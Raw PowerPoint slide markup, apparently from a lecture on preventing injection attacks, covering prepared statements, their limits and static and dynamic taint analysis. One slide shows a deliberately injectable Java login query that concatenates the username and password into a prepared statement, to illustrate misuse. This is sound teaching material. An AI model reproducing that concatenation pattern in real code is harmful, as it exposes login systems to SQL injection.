                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC66FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, password);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login.executeUpdate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();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DB0AD151-D672-4349-B612-52B3593EB3DE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75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12304" y="5278771"/>
            <a:ext cx="162984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bind variable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3690276" y="4893891"/>
            <a:ext cx="1876076" cy="38488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29197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/>
              <a:t>The idea behind prepared statemens</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="2000" dirty="0"/>
              <a:t>(aka parameterised queries) </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" sz="2400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48322" y="3610834"/>
            <a:ext cx="8172150" cy="215529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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prepared Statements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: the query is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parsed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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>first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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and then parameters are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>substituted later</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: parameters are substituted first and then the result is parsed &amp; processed </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2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nl-NL" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key insight: we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> do not parse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the parameters as SQL,                                                          so the substitution becomes less dangerous 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C6B24DE-B380-4D55-81D6-B325C89FE1A8}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62469" name="Group 34"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1108701" y="1293129"/>
            <a:ext cx="6537964" cy="2166667"/>
            <a:chOff x="822884" y="1769321"/>
            <a:chExt cx="6537141" cy="3222950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62470" name="TextBox 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="822884" y="1769321"/>
              <a:ext cx="4457711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SELECT ... FROM ...  WHERE ...</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62471" name="TextBox 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2770800" y="2677502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Accounts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4682429" y="2725181"/>
              <a:ext cx="598166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73" name="TextBox 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2024844" y="2735899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endParaRPr lang="nl-NL" altLang="nl-NL" sz="20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4" name="TextBox 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3284564" y="3583456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408018" y="3888608"/>
              <a:ext cx="607935" cy="476142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28654" y="3050599"/>
              <a:ext cx="609523" cy="47772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603258" y="3060121"/>
              <a:ext cx="1112698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360316" y="2153742"/>
              <a:ext cx="14285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992896" y="2222185"/>
              <a:ext cx="12698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88919" y="2169681"/>
              <a:ext cx="14286" cy="555499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1" name="TextBox 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6012147" y="3505961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82" name="TextBox 25"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1458905" y="4456653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Username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3" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5055535" y="4439016"/>
              <a:ext cx="1011688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 err="1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Passwd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4847" y="3915589"/>
              <a:ext cx="1112697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454050" y="3888608"/>
              <a:ext cx="571428" cy="51582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690560" y="3947332"/>
              <a:ext cx="396825" cy="45709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7" name="TextBox 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4034422" y="4442884"/>
              <a:ext cx="460324" cy="54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CC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$1</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC66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8" name="TextBox 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6899701" y="4428617"/>
              <a:ext cx="460324" cy="54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CC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$2</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC66FF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7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699-FCAF-F238-B39E-97DAA969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Prepared Statements as solution to SQLi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CC2F-E23E-2851-2B65-726DECC1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24745"/>
            <a:ext cx="7990657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Problem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user inputs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are substituted in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>command 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dirty="0"/>
              <a:t>, which is   then parsed &amp; executed by some API, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ie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unsafeAPImethod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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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]...[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baseline="-25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1800" u="sng" dirty="0"/>
              <a:t>Solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: provide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>command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user inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>as separate arguments,  so API methods know which bits to parse &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>execut,e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> and which not, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ie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safeAPImethod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..,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600" dirty="0"/>
              <a:t>Under the hood, the API could simply apply the right encoding operation to the parameters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/>
              <a:t>Here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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[x:=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/>
              <a:t> means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/>
              <a:t> with all occurrences of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/>
              <a:t>replaced by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302F-D195-6F03-85F3-20BDFA0D10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2313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699-FCAF-F238-B39E-97DAA969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Limitation of this approach, more generally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CC2F-E23E-2851-2B65-726DECC1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24745"/>
            <a:ext cx="7990657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as general technique to prevent injection attacks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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Requires custom solution for each injection-prone API method </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> for safe LDAP queries, safe XPath queries,....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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Only works for simple situations that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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>involve just one encoding function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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>involve only simple substitution patterns   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>This means we cannot use it to combat XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(more on that later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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Also, it may not be able to express some highly configurable fancy SQL queries</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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302F-D195-6F03-85F3-20BDFA0D10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836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1914-D5C1-F532-1104-A6DCE4EE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Prepared Statements not quite fool-proof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B327-3024-B9B4-3B14-B5532BBE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Prepared statements are easy to use, but not quite fool-proof</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 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con.preparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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  (</a:t>
            </a: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"SELECT * FROM Account WHERE Username"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+ username + "AND Password =" + password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="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login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.executeUpdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();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/>
              <a:t>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A7A14-7FDA-5CFD-FA43-6197CFABE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88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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" alt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133CD-CA8D-6507-C23F-5605251457BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1259632" y="1358826"/>
            <a:ext cx="6163581" cy="4024658"/>
            <a:chOff x="510309" y="1045474"/>
            <a:chExt cx="6163581" cy="4024658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Wifi</a:t>
              </a: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/ 4G  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1499274" y="414684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1510572" y="3402429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1482627" y="379873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1831728" y="4551381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1372844" y="1766701"/>
              <a:ext cx="1301697" cy="993434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App or  browser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3003342" y="1569035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3203973" y="2247016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3003341" y="2758497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1507724" y="2404501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1" name="Afgeronde rechthoek 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{465EED6F-4678-B2B1-A174-C2AD4BBF4C33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2192246" y="1045474"/>
              <a:ext cx="1724754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HTML renderer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12" name="Rechte verbindingslijn met pijl 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4341A659-7A7E-2DEB-F2F6-5EEB42B27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42042" y="1359102"/>
              <a:ext cx="66812" cy="4385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fgeronde rechthoek 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8A1073A-D2AC-32EE-E328-48F5682ABC78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="510309" y="1128338"/>
              <a:ext cx="1293023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PDF viewer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Explosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E260BCA-8174-D202-E555-6BD3C0181FA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="949019" y="1359103"/>
              <a:ext cx="573060" cy="240455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10" name="Rechte verbindingslijn met pijl 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{670F8074-92B7-7849-5C7F-CEF78B4470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15278" y="1426081"/>
              <a:ext cx="315130" cy="47780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3064381" y="2798322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3247632" y="2301913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3044661" y="1792539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7C5F6F3-09FB-E618-E8ED-8DA122593D39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipV="1">
              <a:off x="2275448" y="1080291"/>
              <a:ext cx="210528" cy="269277"/>
              <a:chOff x="8622963" y="2505809"/>
              <a:chExt cx="232092" cy="305321"/>
            </a:xfrm>
          </p:grpSpPr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59A80BE1-736C-9D7D-FF18-1490EC3F6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66647954-61E3-7E98-68F0-41FBD0BC4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131" y="1753121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Vrije vorm 20"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="223311" flipH="1">
              <a:off x="1735241" y="2420184"/>
              <a:ext cx="3735742" cy="2557326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FA19B3B5-594C-DCC6-7D96-A38949D4CC31}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2311563" y="126049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12D723ED-ADA1-C6E0-BC7B-87F1DA1A2836}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2905157" y="1776521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" name="Explosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D268713-A3A2-8609-65A1-0CF4C6DE6FA2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3118548" y="2265345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7" name="Explosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5347196-19E4-6B67-581B-DC2029683211}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2937418" y="277364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470034" y="1914781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544688" y="2393138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Rechte verbindingslijn met pijl 2"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="17" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2529028" y="2681807"/>
              <a:ext cx="529751" cy="24183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95319A8-F634-597A-E184-68C07CEBB91C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="810519" y="5663636"/>
            <a:ext cx="387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Typical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client-side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attack surface</a:t>
            </a:r>
            <a:endParaRPr lang="en-N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fgeronde rechthoek 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9C246D3-5AF6-143A-DB55-0E7012455A73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="565457" y="2042496"/>
            <a:ext cx="1293023" cy="370041"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AAE97B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45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MS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="145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Offuce</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="145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Explosie 2 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735B60CE-AD7C-0E3E-6EA1-6BE2D2F65270}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1508078" y="2197317"/>
            <a:ext cx="573060" cy="240455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0" rIns="91422" bIns="45710"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="492023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 sz="1633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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Rechte verbindingslijn met pijl 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA55336-1883-B0B6-2DA3-32F97AEAFC1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73907" y="2247163"/>
            <a:ext cx="558043" cy="24774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01155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b) Tainting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77549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Tainting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>aka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Taint analysis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Core idea is to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data flow analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>track &amp; trace user inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tainted data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tainted data ends up in a dangerous API, we give a warning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Like SAL annotations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SA_Pre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Tainted=True] in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PREfast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, but inferred automatically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Such an analysis needs to know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 sources &amp; sinks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operations that combine data and propagate taint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concatenation of two strings is tainted if one of them is  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all operations that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data and remove taint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SQLencoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> removes taint (as far as SQLi is concerned)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="400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Taint analysis can be done </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (DAST) or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>statically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (SAST)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9933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917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981D-BF83-745B-3578-F69F0290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&amp; static taint analysis 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2741-BE87-2FD1-C2F2-987E9209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Perl scripting language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>first introduced a taint mode in 1989</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>external input are marked &amp; tracked </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> execution engine aborts when tainted data is fed to dangerous functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> It looks like Perl 6 will remove taint mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows/Microsoft Office </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>does taint tracking of documents using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mark of the Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to then block / warn users about macros in tainted document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5143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Rules have been tightened in March 2022; maybe macros attacks will become a thing of the past?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SAST tools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(incl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fortify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, discussed in SIO lecture) use static taint analysis to provide warnings about inputs reaching dangerous sinks (without being validated/encoded).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-NL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8079-6688-6488-ADA4-5A6808C526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917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981D-BF83-745B-3578-F69F0290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Tainting limitations?</a:t>
            </a:r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2741-BE87-2FD1-C2F2-987E9209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Multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitisation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operations, for different types of data/different sinks (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> SQL vs HTML), complicate matters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Accurate analysis requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>different kinds of taint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800" dirty="0"/>
